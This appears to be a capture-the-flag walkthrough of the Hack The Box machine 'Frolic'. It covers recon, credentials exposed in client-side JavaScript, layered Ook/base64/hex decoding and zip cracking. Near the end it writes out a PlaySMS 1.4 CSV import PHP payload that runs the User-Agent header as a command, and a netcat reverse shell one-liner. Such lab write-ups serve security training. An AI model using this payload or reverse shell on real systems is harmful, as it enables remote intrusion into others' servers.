🟢Frolic

10.10.10.111

recon & Enum

port scan

PORT     STATE SERVICE
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1880/tcp open  vsat-control
9999/tcp open  abyss

http page on port 1880 & 9999

smb enumeration

nothing intresting over here

directory scan

http://10.10.10.111:1880

http://forlic.htb:1880/
http://forlic.htb:1880/icons
http://forlic.htb:1880/projects
http://forlic.htb:1880/settings
http://forlic.htb:1880/vendor
http://forlic.htb:1880/red
http://forlic.htb:1880/red/images
http://forlic.htb:1880/red/about
http://forlic.htb:1880/vendor/jquery
http://forlic.htb:1880/Icons
http://forlic.htb:1880/vendor/jquery/css
http://forlic.htb:1880/Projects
http://forlic.htb:1880/Settings
http://forlic.htb:1880/vendor/ace
http://forlic.htb:1880/vendor/ace/snippets
http://forlic.htb:1880/ICONS
http://forlic.htb:1880/vendor/ace/LICENSE
http://forlic.htb:1880/nodes

http://10.10.10.111:9999

http://10.10.10.111:9999/
http://10.10.10.111:9999/admin
http://10.10.10.111:9999/test
http://10.10.10.111:9999/backup
http://10.10.10.111:9999/.html
http://10.10.10.111:9999/admin/js
http://10.10.10.111:9999/admin/css
http://10.10.10.111:9999/dev
http://10.10.10.111:9999/backup/user.txt
http://10.10.10.111:9999/backup/password.txt
http://10.10.10.111:9999/dev/test
http://10.10.10.111:9999/dev/backup
http://10.10.10.111:9999/admin/.html
http://10.10.10.111:9999/admin/index.html
http://10.10.10.111:9999/dev/.html
http://10.10.10.111:9999/test/index.php
http://10.10.10.111:9999/dev/backup/index.php
http://10.10.10.111:9999/dev
http://10.10.10.111:9999/backup/password.txt
http://10.10.10.111:9999/backup/user.txt
http://10.10.10.111:9999/dev/test
http://10.10.10.111:9999/dev/backup
http://10.10.10.111:9999/admin/js/login.js
http://10.10.10.111:9999/backup/index.php
http://10.10.10.111:9999/admin/.html
http://10.10.10.111:9999/admin/index.html
http://10.10.10.111:9999/loop
http://10.10.10.111:9999/backup/loop
http://10.10.10.111:9999/loop/loop
http://10.10.10.111:9999/backup/loop/loop
http://10.10.10.111:9999/backup/loop/loop/loop
http://10.10.10.111:9999/loop/loop/loop
http://10.10.10.111:9999/loop/loop/loop/loop

http://10.10.10.111:9999

ngnix server default page is running on and it also discloses the domain name :- http://forlic.htb

http://10.10.10.111:1880

Node-red login page is running on , i need creds for that

http://10.10.10.111:9999/test/

we got php-info , after checking a little i got this :- allow_url_include Off , this means LFI is not possibe

http://10.10.10.111:9999/backup/

i got 2 files & 1 directory user.txt = admin pass.txt = imnothuman loop = nill i tried these creds on node-red login page but it failed

http://10.10.10.111:9999/dev/backup/

/playsms

http://10.10.10.111:9999/admin/

another login page , but when i try to intercept request i got nothing , in sorce code i got a file :- login.js this file was also founded by feroxbuster & it contains creds for this page :- username = admin , password = superduperlooperpassword_lol

var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

after successful login we got redirected to :- http://10.10.10.111:9999/admin/success.html and this page contains :- ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.

after googling a little , i get to know its an Ook language when i decoded it i get this

Nothing here check /asdiSIAJJ0QWE9JAS

http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/

i got this :- UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA

i decoded it with base64 and save it as new file and then run file command on this file and i get to know that its a zip file so i saved it as file.zip and i tried to unzip it , but it needs a password , then i run fcrackzip on it and got the password = password after unzipping it i got a file index.php which contains hex :- 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a after doing hex to text i got this :- KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg== another base64 decode required :- +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->--- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..< another Ook decode required :-

idkwhatispass

http://10.10.10.111:9999/playsms/

Finally we got the password , but its not working for Node-Red login page , but it did work for playsms page. we got in after doing searchsploit i found a exploit which does work on playsms to get RCE

PlaySMS 1.4 - 'import.php' Remote Code Execution            | php/webapps/42044.txt

searchsploit -m php/webapps/42044.txt

PlaySMS 1.4 - 'import.php' Remote Code ExecutionExploit Database

shell as www-data

visit http://10.10.10.111:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import
create a csv file and add the payload in it

Name,Mobile,Email,Group code,Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,22

upload it and intercept the request in burp & change the user-agent to command which i want to execute . for e.g. whoami

enter the reverse shell in user-agent

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.6 4242 >/tmp/f

and we get the shell as www-data

shell as root

it requires buffer overflow , so i skipped it

Previousknife NextWINDOW BOXES

Last updated 2 years ago

hashtagrecon & Enum

hashtagport scan

hashtagsmb enumeration

hashtagdirectory scan

hashtaghttp://10.10.10.111:1880

hashtaghttp://10.10.10.111:9999

hashtaghttp://10.10.10.111:999arrow-up-right9

hashtaghttp://10.10.10.111:1880arrow-up-right

hashtaghttp://10.10.10.111:9999/test/arrow-up-right

hashtaghttp://10.10.10.111:9999/backup/arrow-up-right

hashtaghttp://10.10.10.111:9999/dev/backup/arrow-up-right

hashtaghttp://10.10.10.111:9999/admin/arrow-up-right

hashtaghttp://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/arrow-up-right

hashtaghttp://10.10.10.111:9999/playsms/arrow-up-right

hashtagshell as www-data

hashtagshell as root

recon & Enum

port scan

smb enumeration

directory scan

http://10.10.10.111:1880

http://10.10.10.111:9999

http://10.10.10.111:9999

http://10.10.10.111:1880

http://10.10.10.111:9999/test/

http://10.10.10.111:9999/backup/

http://10.10.10.111:9999/dev/backup/

http://10.10.10.111:9999/admin/

http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/

http://10.10.10.111:9999/playsms/

shell as www-data

shell as root